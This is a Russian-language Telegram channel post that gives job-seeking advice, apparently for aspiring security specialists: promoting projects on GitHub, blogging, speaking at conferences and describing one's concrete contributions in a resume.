▪️Продвигайте свои проекты: публикуйте ссылки на Github, активно участвуйте в профильных чатах, а не read-only формат.
▪️Ведите личный блог в виде сайтика или Telegram-канала, где будете делиться своими наработками.
▪️Ребята уже в 16 лет выступают на крупных конфах, чем вы хуже? Абсолютно точно ничем. Поэтому, даже если есть страх выступления/сцены, то возможно его стоит перебороть.
➡️Я не знаю, как рассказать о своём вкладе в командные проекты
Решение:
▪️Описывайте конкретные задачи, за которые вы отвечали. Это же относиться к резюме. Например: "Я в команде Аудита занимался автоматизацией, т.к. мне были выданы доступы к N сотен объектов, безопасность которых нужно проверять постоянно." Что-нибудь в таком духе)
▪️Упоминайте, какие навыки вы использовали или приобрели в процессе работы. К примеру у меня первая запись в трудовой книжке - это работа младшим аналитиком. Я занимался ручной разметкой сырых данных для нейросети. Изучал алгоритмы и подходы машинного обучения.
Я думаю вам стало понятнее, как пробиться на работу и те 168 юзеров, кто проголосовами за Да, есть проблемы смогут их разрешить)
P.S. важная сноска. Последнее время много пишут с просьбой оценить резюме. Ребят, это занимает достаточно времени. Поэтому в порядке очереди + по настроению на это отвечаю. Для всего остального есть расчётный счёт :)
Если остались какие-то глобальные вопросы, то задавайте в комментариях к этому посту и отвечу в следующей части, если наберём на неё!
🌚 @poxek | 📺 YT | 📺 RT | 📺 VK | 🌚 Магазин мерча
Shown 1 - 24 of 45
Log in to unlock more functionality.